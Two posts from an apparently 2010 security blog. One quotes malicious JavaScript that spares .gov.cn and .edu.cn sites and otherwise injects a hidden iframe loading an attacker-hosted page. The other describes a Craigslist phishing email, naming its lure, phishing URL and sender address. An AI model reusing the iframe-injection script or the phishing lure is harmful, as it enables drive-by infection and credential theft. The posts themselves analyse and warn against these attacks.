marco
blog
Menu:
Geographical targeting of attacks
December 15, 2010
Attackers have often targeted specific geographical regions, or, conversely, spared certain regions from their attacks. A recent example is the following JavaScript found on a malicious web page:
var s, siteUrl, tmpdomain;
var arydomain = new Array(".gov.cn",".edu.cn");
s = document.location + "";
siteUrl=s.substring(7, s.indexOf('/',7));
tmpdomain = 0;
for(var i = 0; i < arydomain.length; i++) {
if(siteUrl.indexOf(arydomain[i]) > -1){
tmpdomain = 1;
break;
}
}
if(tmpdomain == 0) {
document.writeln("<iframe src=http://ggggasz.8866.org:8843/GwN2/index.html?1 width=100 height=0></iframe>");
}
The code checks the location of the current document. If the domain
does not contain the strings .gov.cn or .edu.cn, then the attack is
launched (by dynamically creating an iframe tag), otherwise the script
performs no action.
Certainly not new, but still interesting...
Craigslist phishing
December 11, 2010
Another interesting attack that targets Craigslist users. I've just received an email with the following content:
Is this your item? It has the same description/pics. Please check it: http://sfbay.craigslist.org/1153605583.html
Thank you.
Needless to say, the link in the email does not point to craigslist.org, but to http://031e0e2.netsolhost.com/?check=item-id-1153605583.html. If you visit this page, you are presented with a simple phishing page for Craigslist:
It was surely a throw-away address, but as a reference, the original sender of the phishing email was brathwaite800345@gmail.com.
Stay away from this guy and this site...
